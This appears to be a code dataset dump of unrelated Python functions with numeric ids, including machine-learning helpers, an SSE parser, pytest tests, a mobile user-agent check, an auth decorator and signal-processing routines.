content: string (lengths 22 to 815k); id: int64 (0 to 4.91M)
def repackage_hidden(h): """ Wraps hidden states in new Variables, to detach them from their history. """ if isinstance(h, torch.Tensor): return h.detach() else: return tuple(v.detach() for v in h)
23,900
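A minimal sketch of how a helper like `repackage_hidden` above is typically used in truncated backpropagation through time; the LSTM sizes, the dummy data, and the loss are placeholders, and PyTorch is assumed to be installed.

    import torch
    import torch.nn as nn

    def repackage_hidden(h):
        # same idea as above: cut the hidden state loose from the old graph
        if isinstance(h, torch.Tensor):
            return h.detach()
        return tuple(v.detach() for v in h)

    rnn = nn.LSTM(input_size=8, hidden_size=16, batch_first=True)
    hidden = None
    for chunk in range(3):                     # one chunk of the sequence per step
        x = torch.randn(4, 5, 8)               # (batch, seq_len, features), dummy data
        if hidden is not None:
            hidden = repackage_hidden(hidden)  # gradients stop at the chunk boundary
        out, hidden = rnn(x, hidden)
        out.pow(2).mean().backward()           # backprop only through the current chunk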
def stream_raw_sse(mkrequest, *pargs, _last_event_id=None, headers=None, **kwargs): """ Streams Server-Sent Events, each event produced as a sequence of (field, value) pairs. Does not handle reconnection, etc. """ if headers is None: headers = {} headers['Accept'] = 'text/event-stream' headers['Cache-Control'] = 'no-cache' # Per https://html.spec.whatwg.org/multipage/server-sent-events.html#sse-processing-model if _last_event_id is not None: headers['Last-Event-ID'] = _last_event_id with mkrequest(*pargs, headers=headers, stream=True, **kwargs) as resp: fields = [] for line in resp.iter_lines(decode_unicode=True): # https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation if not line: yield fields fields = [] elif line.startswith(':'): pass elif ':' in line: field, value = line.split(':', 1) if value.startswith(' '): value = value[1:] fields += [(field, value)] else: # Non-blank, without a colon fields += [(line, '')]
23,901
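A sketch of how the generator above could be consumed with `requests`; the URL is a placeholder and `stream_raw_sse` is assumed to be importable from the surrounding module. Note that repeated `data` fields within one event are collapsed by the `dict()` call here.

    import requests

    for fields in stream_raw_sse(requests.get, "https://example.com/events"):
        event = dict(fields)                      # e.g. {'event': 'update', 'data': '...'}
        print(event.get("event", "message"), event.get("data", ""))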
def test_exception_during_cleanup(capfd): """ Report exceptions during cleanup to stderr """ original_rmtree = shutil.rmtree delete_paths = [] def make_directory_unremoveable(path, *args, **kwargs): os.chmod(path, stat.S_IRUSR) # remove x permission so we can't delete directory delete_paths.append(path) return original_rmtree(path, *args, **kwargs) try: with mock.patch.object(main.shutil, 'rmtree', make_directory_unremoveable): run_command("- echo hello") out, err = capfd.readouterr() assert "Unable to remove" in err finally: for path in delete_paths: os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IEXEC) shutil.rmtree(path)
23,902
def support_acctgroup_acctproject(version): """ Whether this Lustre version supports acctgroup and acctproject """ if version.lv_name == "es2": return False return True
23,903
def print_partitions(dstore: Datastore, datasets: List[str]) -> None: """Prints the known partition keys and their values for each of the datasets.""" for single_ds in datasets: parts = dstore.get_datapackage_descriptor(single_ds).get_partitions() print(f'\nPartitions for {single_ds} ({dstore.get_doi(single_ds)}):') for pkey in sorted(parts): print(f' {pkey}: {", ".join(str(x) for x in sorted(parts[pkey]))}') if not parts: print(' -- no known partitions --')
23,904
def decodeInventoryEntry_level1(document): """ Decodes a basic entry such as: '6 lobster cake' or '6 cakes' @param document : NLP Doc object :return: Inventory object with the decoded amount, item and unit """ count = Inventory(str(document)) for token in document: if token.pos_ in (u'NOUN', u'NNS', u'NN'): item = str(token) for child in token.children: if child.dep_ == u'compound' or child.dep_ == u'ad': item = str(child) + str(item) elif child.dep_ == u'nummod': count.amount = str(child).strip() for numerical_child in child.children: # not arithmetic: the numbers are concatenated as strings count.amount = str(numerical_child) + str(count.amount).strip() else: print("WARNING: unknown child: " + str(child) + ':' + str(child.dep_)) count.item = item count.unit = item return count
23,905
def target_precheck(root_dir, configs_dir, target_name, info_defaults, required_scripts): """ Checks: 1. That the target (subsys or experiment) config includes an 'active' field indicating whether to run it 2. If the target is active, check that all required scripts are present and executable This function returns: 1. a dict containing a 'status' field (boolean, true if all is preconfigured correctly) and a 'message' containing an explanation as a string if one is necessary 2. A dict containing the target config's entries for each of the fields in info_defaults (uses the default if it's not specified) """ target_conf = attempt_parse_config(configs_dir, target_name) if target_conf is None: return ({'success': False, 'message': 'config.json for {} is missing or fails to parse'.format(target_name)}, None) update_fields = [] target_info = {} for field, default in info_defaults.items(): update_fields.append(field) target_info[field] = default for field in update_fields: if field in target_conf: target_info[field] = target_conf[field] # no need to check target subdirectory if it is not active if not target_conf['active']: return ({'success': True, 'message': 'Inactive'}, target_info) target_subdir = os.path.join(root_dir, target_name) if not os.path.exists(target_subdir): return ({'success': False, 'message': 'Script subdirectory for {} missing'.format(target_name)}, None) invalid_scripts = check_present_and_executable(target_subdir, required_scripts) if invalid_scripts: return ({ 'success': False, 'message': 'Necessary files are missing from {} or not executable: {}'.format( target_subdir, ', '.join(invalid_scripts)) }, None) return ({'success': True, 'message': ''}, target_info)
23,906
def test_thermoml_mole_constraints(): """A collection of tests to ensure that the Mole fraction constraint is implemented correctly alongside solvent constraints.""" # Mole fraction data_set = ThermoMLDataSet.from_file(get_data_filename("test/properties/mole.xml")) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Mass fraction data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_mass.xml") ) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Mole fraction data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_mole.xml") ) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Molality data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_molality.xml") ) assert data_set is not None assert len(data_set) > 0
23,907
def from_ir_objs(ir_objs: Collection[IrCell]) -> AnnData: """\ Convert a collection of :class:`IrCell` objects to an :class:`~anndata.AnnData`. This is useful for converting arbitrary data formats into the scirpy :ref:`data-structure`. {doc_working_model} Parameters ---------- ir_objs Returns ------- :class:`~anndata.AnnData` object with :term:`IR` information in `obs`. """ ir_df = pd.DataFrame.from_records( (_process_ir_cell(x) for x in ir_objs), index="cell_id" ) adata = AnnData(obs=ir_df, X=np.empty([ir_df.shape[0], 0])) _sanitize_anndata(adata) return adata
23,908
def main(args): """ transforms the problem file template """ if len(args) < 1: # print errors to the error stream eprint("Usage: {0} <amounts-to-sum>".format(os.path.basename(sys.argv[0]))) exit(-1) # this is a simple example of an input data transformation in Python: amounts = [float(a.strip()) for a in args] name = 'pumps_' + '-'.join(args) # render the values into the template transformed = transform(name, amounts, input) # output the template to the standard output print(transformed) print("; This PDDL problem file was generated on", str(datetime.datetime.now()))
23,909
def s3_is_mobile_client(request): """ Simple UA Test whether client is a mobile device @todo: parameter description? """ env = request.env if env.http_x_wap_profile or env.http_profile: return True if env.http_accept and \ env.http_accept.find("text/vnd.wap.wml") > 0: return True keys = ["iphone", "ipod", "android", "opera mini", "blackberry", "palm", "windows ce", "iemobile", "smartphone", "medi", "sk-0", "vk-v", "aptu", "xda-", "mtv ", "v750", "p800", "opwv", "send", "xda2", "sage", "t618", "qwap", "veri", "t610", "tcl-", "vx60", "vx61", "lg-k", "lg-l", "lg-m", "lg-o", "lg-a", "lg-b", "lg-c", "xdag", "lg-f", "lg-g", "sl45", "emul", "lg-p", "lg-s", "lg-t", "lg-u", "lg-w", "6590", "t250", "qc21", "ig01", "port", "m1-w", "770s", "n710", "ez60", "mt50", "g1 u", "vk40", "bird", "tagt", "pose", "jemu", "beck", "go.w", "jata", "gene", "smar", "g-mo", "o2-x", "htc_", "hei-", "fake", "qc-7", "smal", "htcp", "htcs", "craw", "htct", "aste", "htca", "htcg", "teli", "telm", "kgt", "mwbp", "kwc-", "owg1", "htc ", "kgt/", "htc-", "benq", "slid", "qc60", "dmob", "blac", "smt5", "nec-", "sec-", "sec1", "sec0", "fetc", "spv ", "mcca", "nem-", "spv-", "o2im", "m50/", "ts70", "arch", "qtek", "opti", "devi", "winw", "rove", "winc", "talk", "pant", "netf", "pana", "esl8", "pand", "vite", "v400", "whit", "scoo", "good", "nzph", "mtp1", "doco", "raks", "wonu", "cmd-", "cell", "mode", "im1k", "modo", "lg-d", "idea", "jigs", "bumb", "sany", "vulc", "vx70", "psio", "fly_", "mate", "pock", "cdm-", "fly-", "i230", "lge-", "lge/", "argo", "qc32", "n701", "n700", "mc21", "n500", "midp", "t-mo", "airn", "bw-u", "iac", "bw-n", "lg g", "erk0", "sony", "alav", "503i", "pt-g", "au-m", "treo", "ipaq", "dang", "seri", "mywa", "eml2", "smb3", "brvw", "sgh-", "maxo", "pg-c", "qci-", "vx85", "vx83", "vx80", "vx81", "pg-8", "pg-6", "phil", "pg-1", "pg-2", "pg-3", "ds12", "scp-", "dc-s", "brew", "hipt", "kddi", "qc07", "elai", "802s", "506i", "dica", "mo01", "mo02", "avan", "kyoc", "ikom", "siem", "kyok", "dopo", "g560", "i-ma", "6310", "sie-", "grad", "ibro", "sy01", "nok6", "el49", "rim9", "upsi", "inno", "wap-", "sc01", "ds-d", "aur ", "comp", "wapp", "wapr", "waps", "wapt", "wapu", "wapv", "wapy", "newg", "wapa", "wapi", "wapj", "wapm", "hutc", "lg/u", "yas-", "hita", "lg/l", "lg/k", "i-go", "4thp", "bell", "502i", "zeto", "ez40", "java", "n300", "n302", "mmef", "pn-2", "newt", "1207", "sdk/", "gf-5", "bilb", "zte-", "maui", "qc-3", "qc-2", "blaz", "r600", "hp i", "qc-5", "moto", "cond", "motv", "virg", "ccwa", "audi", "shar", "i-20", "samm", "sama", "sams", "sch-", "mot ", "http", "505i", "mot-", "n502", "topl", "n505", "mobi", "3gso", "wmlb", "ezwa", "qc12", "abac", "tdg-", "neon", "mio8", "sp01", "rozo", "vx98", "dait", "t600", "anyw", "tx-9", "sava", "m-cr", "tsm-", "mioa", "tsm5", "klon", "capi", "tsm3", "hcit", "libw", "lg50", "mc01", "amoi", "lg54", "ez70", "se47", "n203", "vk52", "vk53", "vk50", "webc", "haie", "semc", "grun", "play", "palm", "a wa", "anny", "prox", "o2 x", "ezze", "symb", "hs-c", "pg13", "mits", "kpt ", "qa-a", "501i", "pdxg", "iris", "pluc", "acoo", "soft", "hpip", "iac/", "iac-", "aus ", "s55/", "vx53", "vx52", "chtm", "meri", "merc", "your", "huaw", "cldc", "voda", "smit", "x700", "mozz", "lexi", "up.b", "sph-", "keji", "jbro", "wig ", "attw", "pire", "r380", "lynx", "anex", "vm40", "hd-m", "504i", "w3c ", "c55/", "w3c-", "upg1", "t218", "tosh", "acer", "hd-t", "eric", "hd-p", "noki", "acs-", "dbte", "n202", "tim-", "alco", "ezos", "dall", "leno", "alca", "asus", "m3ga", "utst", "aiko", "n102", 
"n101", "n100", "oran"] ua = (env.http_user_agent or "").lower() if [key for key in keys if key in ua]: return True return False
23,910
def list_config(args): """ febo config """ # # add cwd to path # cwd = os.getcwd() # sys.path.insert(0, cwd) # print config print(config_manager.get_yaml(include_default=True)) if args.save: config_manager.write_yaml(args.save, include_default=True) print(f"Saved config to {args.save}.")
23,911
def welcome(): """List all available api routes.""" return ( f"Available Routes:<br/>" f"/api/v1.0/precipitation<br/>" f"/api/v1.0/stations<br/>" f"/api/v1.0/tobs<br/>" f"/api/v1.0/start<br/>" f"/api/v1.0/start/end" )
23,912
def get_cases_from_input_df(input_df: pd.DataFrame) -> List[Case]: """ Get the case attributes :return: """ cases: List[Case] = [] for index, row in input_df.iterrows(): # Create a case object from the row values in the input df cases.append(Case.from_dict(row.to_dict())) return cases
23,913
def transfer_J_values(source_net, target_net): """ Transfer the values of the interactions from source to target net. All the interactions corresponding to the `J` values of `source_net` are checked, and those interactions that are also active in `target_net` are copied into `target_net`. """ source_J = source_net.J.get_value() target_J = target_net.J.get_value() target_interactions = target_net.interactions for idx, J in enumerate(source_J): interaction = source_net.J_index_to_interaction(idx) # print(interaction) # if `interaction` is active in `target_net`, then we transfer # its value from `source_net` to `target_net`. if interaction in target_interactions: target_idx = target_net.tuple_to_J_index(interaction) target_J[target_idx] = J target_net.J.set_value(target_J)
23,914
def init_STRFNet(sample_batch, num_classes, num_kernels=32, residual_channels=[32, 32], embedding_dimension=1024, num_rnn_layers=2, frame_rate=None, bins_per_octave=None, time_support=None, frequency_support=None, conv2d_sizes=(3, 3), mlp_hiddims=[], activate_out=nn.LogSoftmax(dim=1) ): """Initialize a STRFNet for multi-class classification. This is a one-stop solution to create STRFNet and its variants. Parameters ---------- sample_batch: [Batch,Time,Frequency] torch.FloatTensor A batch of training examples that is used for training. Some dimension parameter of the network is inferred cannot be changed. num_classes: int Number of classes for the classification task. Keyword Parameters ------------------ num_kernels: int, 32 2*num_kernels is the number of STRF/2D kernels. Doubling is due to the two orientations of the STRFs. residual_channels: list(int), [32, 32] Specify the number of conv2d channels for each residual block. embedding_dimension: int, 1024 Dimension of the learned embedding (RNN output). frame_rate: float, None Sampling rate [samples/second] / hop size [samples]. No STRF kernels by default. bins_per_octave: int, None Frequency bins per octave in CQT sense. (TODO: extend for non-CQT rep.) No STRF kernels by default. time_support: float, None Number of seconds spanned by each STRF kernel. No STRF kernels by default. frequency_support: int/float, None If frame_rate or bins_per_octave is None, interpret as GaborSTRFConv. - Number of frequency bins (int) spanned by each STRF kernel. Otherwise, interpret as STRFConv. - Number of octaves spanned by each STRF kernel. No STRF kernels by default. conv2d_sizes: (int, int), (3, 3) nn.Conv2d kernel dimensions. mlp_hiddims: list(int), [] Final MLP hidden layer dimensions. Default has no hidden layers. activate_out: callable, nn.LogSoftmax(dim=1) Activation function at the final layer. Default uses LogSoftmax for multi-class classification. """ if all(p is not None for p in (time_support, frequency_support)): is_strfnet = True if all(p is not None for p in (frame_rate, bins_per_octave)): kernel_type = 'wavelet' else: assert all( type(p) is int for p in (time_support, frequency_support) ) kernel_type = 'gabor' else: is_strfnet = False is_cnn = conv2d_sizes is not None is_hybrid = is_strfnet and is_cnn if is_hybrid: print(f"Preparing for Hybrid STRFNet; kernel type is {kernel_type}.") elif is_strfnet: print(f"Preparing for STRFNet; kernel type is {kernel_type}.") elif is_cnn: print("Preparing for CNN.") else: raise ValueError("Insufficient parameters. 
Check example_STRFNet.") if not is_strfnet: strf_layer = None elif kernel_type == 'wavelet': strf_layer = STRFConv( frame_rate, bins_per_octave, time_support, frequency_support, num_kernels ) else: strf_layer = GaborSTRFConv( time_support, frequency_support, num_kernels ) if is_cnn: d1, d2 = conv2d_sizes if d1 % 2 == 0: d1 += 1 print("Enforcing odd conv2d dimension.") if d2 % 2 == 0: d2 += 1 print("Enforcing odd conv2d dimension.") conv2d_layer = nn.Conv2d( 1, 2*num_kernels, # Double to match the total number of STRFs (d1, d2), padding=(d1//2, d2//2) ) else: conv2d_layer = None residual_layer = ModResnet( (4 if is_hybrid else 2)*num_kernels, residual_channels, False ) with torch.no_grad(): flattened_dimension = STRFNet.cnn_forward( sample_batch, strf_layer, conv2d_layer, residual_layer ).shape[-1] linear_layer = nn.Linear(flattened_dimension, embedding_dimension) rnn = nn.GRU( embedding_dimension, embedding_dimension, batch_first=True, num_layers=num_rnn_layers, bidirectional=True ) mlp = MLP( 2*embedding_dimension, num_classes, hiddims=mlp_hiddims, activate_hid=nn.LeakyReLU(), activate_out=activate_out, batchnorm=[True]*len(mlp_hiddims) ) return STRFNet(strf_layer, conv2d_layer, residual_layer, linear_layer, rnn, mlp)
23,915
def test_execute_retry(mocked_get): """Test request retry.""" mocked_get.side_effect = Mock(side_effect=[ MagicMock(status_code=500, text=''), MagicMock(status_code=200, text='{}') ]) response = request.execute( max_retries=4, retry_interval=0, url='blabla', method='GET' ) assert response.status_code == 200 assert response.text == '{}' assert mocked_get.call_count == 2
23,916
def normalize_nfc(txt: AnyStr) -> bytes: """ Normalize message to NFC and return bytes suitable for protobuf. This seems to be bitcoin-qt standard of doing things. """ str_txt = txt.decode() if isinstance(txt, bytes) else txt return unicodedata.normalize("NFC", str_txt).encode()
23,917
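A self-contained check of the NFC behaviour described above: a precomposed 'é' and the decomposed 'e' plus a combining acute accent normalize to the same byte string.

    import unicodedata

    def normalize_nfc(txt):
        s = txt.decode() if isinstance(txt, bytes) else txt
        return unicodedata.normalize("NFC", s).encode()

    # composed U+00E9 and decomposed "e" + U+0301 yield identical UTF-8 bytes
    assert normalize_nfc("caf\u00e9") == normalize_nfc("cafe\u0301") == b"caf\xc3\xa9"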
def synchronized(wrapped: Callable[..., Any]) -> Any: """The missing @synchronized decorator https://git.io/vydTA""" _lock = threading.RLock() @functools.wraps(wrapped) def _wrapper(*args, **kwargs): with _lock: return wrapped(*args, **kwargs) return _wrapper
23,918
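A small usage sketch for the decorator above; note that each decorated function gets its own re-entrant lock, so the four threads below serialize only because they all call the same decorated function.

    import functools
    import threading

    def synchronized(wrapped):
        _lock = threading.RLock()

        @functools.wraps(wrapped)
        def _wrapper(*args, **kwargs):
            with _lock:
                return wrapped(*args, **kwargs)
        return _wrapper

    counter = 0

    @synchronized
    def bump():
        global counter
        counter += 1

    threads = [threading.Thread(target=lambda: [bump() for _ in range(10_000)]) for _ in range(4)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(counter)  # 40000: the lock keeps each read-modify-write atomic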
def test_remove_instance_from_recuid(): """remove an instance from an event which is specified via an additional VEVENT with the same UID (which we call `recuid` here)""" event = Event.fromString(_get_text('event_rrule_recuid'), **EVENT_KWARGS) assert event.raw.split('\r\n').count('UID:event_rrule_recurrence_id') == 2 event.delete_instance(BERLIN.localize(dt.datetime(2014, 7, 7, 7, 0))) assert event.raw.split('\r\n').count('UID:event_rrule_recurrence_id') == 1 assert 'EXDATE;TZID=Europe/Berlin:20140707T070000' in event.raw.split('\r\n')
23,919
def corrgroups60__decision_tree(): """ Decision Tree """ return sklearn.tree.DecisionTreeRegressor(random_state=0)
23,920
def auth_required(*auth_methods): """ Decorator that protects endpoints through multiple mechanisms Example:: @app.route('/dashboard') @auth_required('token', 'session') def dashboard(): return 'Dashboard' :param auth_methods: Specified mechanisms. """ login_mechanisms = { 'token': lambda: _check_token(), 'basic': lambda: _check_http_auth(), 'session': lambda: current_user.is_authenticated() } def wrapper(fn): @wraps(fn) def decorated_view(*args, **kwargs): h = {} mechanisms = [(method, login_mechanisms.get(method)) for method in auth_methods] for method, mechanism in mechanisms: if mechanism and mechanism(): return fn(*args, **kwargs) elif method == 'basic': r = _security.default_http_auth_realm h['WWW-Authenticate'] = 'Basic realm="%s"' % r if _security._unauthorized_callback: return _security._unauthorized_callback() else: return _get_unauthorized_response(headers=h) return decorated_view return wrapper
23,921
def _get_default_data_dir_name(): """ Gets default data directory """ return _get_path(DATA_DIR)
23,922
def point_inside_triangle(p, t, tol=None): """ Test to see if a point is inside a triangle. The point is first projected to the plane of the triangle for this test. :param ndarray p: Point inside triangle. :param ndarray t: Triangle vertices. :param float tol: Tolerance for barycentric coordinate check. :return: *True* if point is inside triangle, *False* if not. :rtype: bool """ if tol is None: tol = Settings.ptol v01 = t[1] - t[0] v02 = t[2] - t[0] vp = p - t[0] d01 = dot(v01, v01) d12 = dot(v01, v02) d02 = dot(v02, v02) dp1 = dot(vp, v01) dp2 = dot(vp, v02) denom = d01 * d02 - d12 * d12 if denom == 0.: return False u = (d02 * dp1 - d12 * dp2) / denom v = (d01 * dp2 - d12 * dp1) / denom if u >= -tol and v >= -tol and u + v <= 1. + tol: return True return False
23,923
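A worked example of the barycentric test above, assuming the function and its `dot` import are in scope; `tol` is passed explicitly here so the `Settings` default is not needed.

    import numpy as np

    t = np.array([[0.0, 0.0, 0.0],   # unit right triangle in the z=0 plane
                  [1.0, 0.0, 0.0],
                  [0.0, 1.0, 0.0]])

    print(point_inside_triangle(np.array([0.25, 0.25, 0.0]), t, tol=1e-9))  # True  (u = v = 0.25)
    print(point_inside_triangle(np.array([0.80, 0.80, 0.0]), t, tol=1e-9))  # False (u + v = 1.6 > 1)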
def test_authorize_query_joined_load(engine, oso, fixture_data): """Test a query involving multiple models.""" oso.load_str( """allow("user", "read", post: Post) if post.id = 1; allow("user", "read", user: User) if user.id = 0; allow("user", "read", user: User) if user.id = 1; allow("all_posts", "read", _: Post);""" ) session = AuthorizedSession(oso, "user", {Post: "read", User: "read"}, bind=engine) authorized = session.query(User).options(joinedload(User.posts)) print_query(authorized) print(authorized[0].posts) assert len(authorized[0].posts) == 1
23,924
def merge_dfs(x, y): """Merge the two dataframes and download a CSV.""" df = pd.merge(x, y, on='Collection_Number', how='outer') indexed_df = df.set_index(['Collection_Number']) indexed_df['Access_Notes_Regarding_Storage_Locations'].fillna('No note', inplace=True) today = datetime.datetime.today().strftime('%Y-%m-%d') output_file = 'storage_locations_' + str(today) + '.csv' indexed_df.to_csv(output_file) print('Location report exported as ' + output_file) return indexed_df
23,925
def consumer(func): """A decorator function that takes care of starting a coroutine automatically on call. See http://www.dabeaz.com/generators/ for more details. """ def start(*args, **kwargs): cr = func(*args, **kwargs) next(cr) return cr return start
23,926
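A self-contained example of the priming decorator above: the returned coroutine has already advanced to its first `yield`, so `send()` can be called straight away.

    def consumer(func):
        def start(*args, **kwargs):
            cr = func(*args, **kwargs)
            next(cr)          # advance to the first yield
            return cr
        return start

    @consumer
    def printer(prefix):
        while True:
            item = yield
            print(prefix, item)

    sink = printer(">>")      # no explicit next() needed
    sink.send("hello")        # prints: >> hello
    sink.send("world")        # prints: >> world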
def convert_openfermion_op(openfermion_op, n_qubits=None): """convert_openfermion_op Args: openfermion_op (:class:`openfermion.ops.QubitOperator`) n_qubit (:class:`int`): if None (default), it automatically calculates the number of qubits required to represent the given operator Returns: :class:`qulacs.GeneralQuantumOperator` """ if n_qubits is None: _n_qubits = _count_qubit_in_qubit_operator(openfermion_op) else: _n_qubits = n_qubits res = GeneralQuantumOperator(_n_qubits) for pauli_product in openfermion_op.terms: coef = float(np.real(openfermion_op.terms[pauli_product])) pauli_string = '' for pauli_operator in pauli_product: pauli_string += pauli_operator[1] + ' ' + str(pauli_operator[0]) pauli_string += ' ' res.add_operator(coef, pauli_string[:-1]) return res
23,927
def ssqueeze(Wx, w, ssq_freqs=None, scales=None, fs=None, t=None, transform='cwt', squeezing='sum'): """Calculates the synchrosqueezed CWT or STFT of `x`. Used internally by `synsq_cwt` and `synsq_stft_fwd`. # Arguments: Wx or Sx: np.ndarray CWT or STFT of `x`. w: np.ndarray Phase transform of `Wx` or `Sx`. Must be >=0. ssq_freqs: str['log', 'linear'] / np.ndarray / None Frequencies to synchrosqueeze CWT scales onto. Scale-frequency mapping is only approximate and wavelet-dependent. If None, will infer from and set to same distribution as `scales`. scales: str['log', 'linear'] / np.ndarray CWT scales. Ignored if transform='stft'. - 'log': exponentially distributed scales, as pow of 2: `[2^(1/nv), 2^(2/nv), ...]` - 'linear': linearly distributed scales. !!! EXPERIMENTAL; default scheme for len(x)>2048 performs poorly (and there may not be a good non-piecewise scheme). fs: float / None Sampling frequency of `x`. Defaults to 1, which makes ssq frequencies range from 1/dT to 0.5, i.e. as fraction of reference sampling rate up to Nyquist limit; dT = total duration (N/fs). Overridden by `t`, if provided. Relevant on `t` and `dT`: https://dsp.stackexchange.com/a/71580/50076 t: np.ndarray / None Vector of times at which samples are taken (eg np.linspace(0, 1, n)). Must be uniformly-spaced. Defaults to `np.linspace(0, len(x)/fs, len(x), endpoint=False)`. Overrides `fs` if not None. transform: str['cwt', 'stft'] Whether `Wx` is from CWT or STFT (`Sx`). squeezing: str['sum', 'lebesgue'] - 'sum' = standard synchrosqueezing using `Wx`. - 'lebesgue' = as in [4], setting `Wx=ones()/len(Wx)`, which is not invertible but has better robustness properties in some cases. Not recommended unless purpose is understood. # Returns: Tx: np.ndarray [nf x n] Synchrosqueezed CWT of `x`. (rows=~frequencies, cols=timeshifts) (nf = len(ssq_freqs); n = len(x)) `nf = na` by default, where `na = len(scales)`. ssq_freqs: np.ndarray [nf] Frequencies associated with rows of `Tx`. # References: 1. Synchrosqueezed Wavelet Transforms: a Tool for Empirical Mode Decomposition. I. Daubechies, J. Lu, H.T. Wu. https://arxiv.org/pdf/0912.2437.pdf 2. The Synchrosqueezing algorithm for time-varying spectral analysis: robustness properties and new paleoclimate applications. G. Thakur, E. Brevdo, N.-S. Fučkar, and H.-T. Wu. https://arxiv.org/abs/1105.0010 3. Synchrosqueezing-based Recovery of Instantaneous Frequency from Nonuniform Samples. G. Thakur and H.-T. Wu. https://arxiv.org/abs/1006.2533 4. Synchrosqueezing Toolbox, (C) 2014--present. E. Brevdo, G. Thakur. https://github.com/ebrevdo/synchrosqueezing/blob/master/synchrosqueezing/ synsq_squeeze.m """ def _ssqueeze(w, Wx, nv, ssq_freqs, transform, ssq_scaletype, cwt_scaletype): # incorporate threshold by zeroing out Inf values, so they get ignored Wx = replace_at_inf(Wx, ref=w, replacement=0) # do squeezing by finding which frequency bin each phase transform point # w[a, b] lands in (i.e. 
to which f in ssq_freqs each w[a, b] is closest) # equivalent to argmin(abs(w[a, b] - ssq_freqs)) for every a, b with np.errstate(divide='ignore'): k = (find_closest(w, ssq_freqs) if ssq_scaletype != 'log' else find_closest(np.log2(w), np.log2(ssq_freqs))) # Tx[k[i, j], j] += Wx[i, j] * norm if transform == 'cwt': # Eq 14 [2]; Eq 2.3 [1] if cwt_scaletype == 'log': # ln(2)/nv == diff(ln(scales))[0] == ln(2**(1/nv)) Tx = indexed_sum(Wx / scales**(1/2) * np.log(2) / nv, k) elif cwt_scaletype == 'linear': # omit /dw since it's cancelled by *dw in inversion anyway da = (scales[1] - scales[0]) Tx = indexed_sum(Wx / scales**(3/2) * da, k) else: # 'stft' # TODO validate Tx = indexed_sum(Wx * (ssq_freqs[1] - ssq_freqs[0]), k) return Tx def _compute_associated_frequencies(dt, na, N, transform, ssq_scaletype): dT = dt * N # normalized frequencies to map discrete-domain to physical: # f[[cycles/samples]] -> f[[cycles/second]] # maximum measurable (Nyquist) frequency of data fM = 1 / (2 * dt) # minimum measurable (fundamental) frequency of data fm = 1 / dT # frequency divisions `w_l` to search over in Synchrosqueezing if ssq_scaletype == 'log': # [fm, ..., fM] ssq_freqs = fm * np.power(fM / fm, np.arange(na) / (na - 1)) else: if transform == 'cwt': ssq_freqs = np.linspace(fm, fM, na) elif transform == 'stft': # ??? seems to be 0 to f_sampling/2, but why use N? # what about fm and fM? ssq_freqs = np.linspace(0, 1, N) / dt ssq_freqs = ssq_freqs[:N // 2] return ssq_freqs def _process_args(w, fs, t, N, transform, squeezing, scales): if w.min() < 0: raise ValueError("found negatives in `w`") if transform not in ('cwt', 'stft'): raise ValueError("`transform` must be one of: cwt, stft " "(got %s)" % squeezing) if squeezing not in ('sum', 'lebesgue'): raise ValueError("`squeezing` must be one of: sum, lebesgue " "(got %s)" % squeezing) if scales is None and transform == 'cwt': raise ValueError("`scales` can't be None if `transform == 'cwt'`") dt, *_ = _process_fs_and_t(fs, t, N) return dt na, N = Wx.shape dt = _process_args(w, fs, t, N, transform, squeezing, scales) scales, cwt_scaletype, _, nv = process_scales(scales, N, get_params=True) if not isinstance(ssq_freqs, np.ndarray): if isinstance(ssq_freqs, str): ssq_scaletype = ssq_freqs else: # default to same scheme used by `scales` ssq_scaletype = cwt_scaletype ssq_freqs = _compute_associated_frequencies(dt, na, N, transform, ssq_scaletype) else: ssq_scaletype = _infer_scaletype(ssq_freqs) if squeezing == 'lebesgue': # from reference [3] Wx = np.ones(Wx.shape) / len(Wx) Tx = _ssqueeze(w, Wx, nv, ssq_freqs, transform, ssq_scaletype, cwt_scaletype) return Tx, ssq_freqs
23,928
def ConvertStringsToColumnHeaders(proposed_headers): """Converts a list of strings to column names which spreadsheets accept. When setting values in a record, the keys which represent column names must fit certain rules. They are all lower case, contain no spaces or special characters. If two columns have the same name after being sanitized, the columns further to the right have _2, _3, _4, etc. appended to them. If there are column names which consist of all special characters, or if the column header is blank, an obfuscated value will be used for a column name. This method does not handle blank column names or column names with only special characters. """ headers = [] for input_string in proposed_headers: # TODO: probably a more efficient way to do this. Perhaps regex. sanitized = input_string.lower().replace('_', '').replace( ':', '').replace(' ', '') # When the same sanitized header appears multiple times in the first row # of a spreadsheet, _n is appended to the name to make it unique. header_count = headers.count(sanitized) if header_count > 0: headers.append('%s_%i' % (sanitized, header_count+1)) else: headers.append(sanitized) return headers
23,929
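A quick illustration of the sanitizing rules above, assuming the function is in scope; the header strings are made up.

    print(ConvertStringsToColumnHeaders(["First Name", "first_name", "Zip: Code"]))
    # ['firstname', 'firstname_2', 'zipcode']  -- the duplicate gets a _2 suffix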
def parse_interactions(filename="train.csv"): """ Parse the train data and return the interaction matrix alone """ with open(os.path.join(data_path, filename), "r") as f: # Discard first line lines = f.readlines()[1:] num_lines = len(lines) # Create container interactions = sp.dok_matrix((NUM_PLAYLIST, NUM_TRACKS), dtype=np.uint8) for i, line in enumerate(lines): playlist, track = [int(i) for i in line.split(",")] interactions[playlist, track] = 1 print("\rParsing interactions: {:.4}%".format((i / num_lines) * 100), end="") print("\n") # Return matrix return interactions
23,930
